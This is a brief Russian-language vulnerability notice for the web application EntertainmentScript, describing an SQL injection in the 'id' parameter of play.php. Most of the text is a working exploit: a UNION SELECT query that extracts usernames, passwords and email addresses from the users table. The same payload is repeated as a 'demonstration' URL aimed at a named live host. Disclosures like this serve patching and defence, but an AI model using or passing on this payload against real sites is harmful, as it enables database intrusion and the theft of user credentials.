Программа: EntertainmentScript
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием play.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
play.php?id=-96969+union+select+0x28284d722e53514c2929,
concat(username,0x3a3a3a3a3a,password),3, 4,email,6+from+users/*
Демонстрация:
http://demo.fastfreemedia.com/play.php?id=-96969+union+select+
0x28284d722e53514c2929,concat(username,0x3a3a3a3a3a,
password),3,4,email,6+from+users/*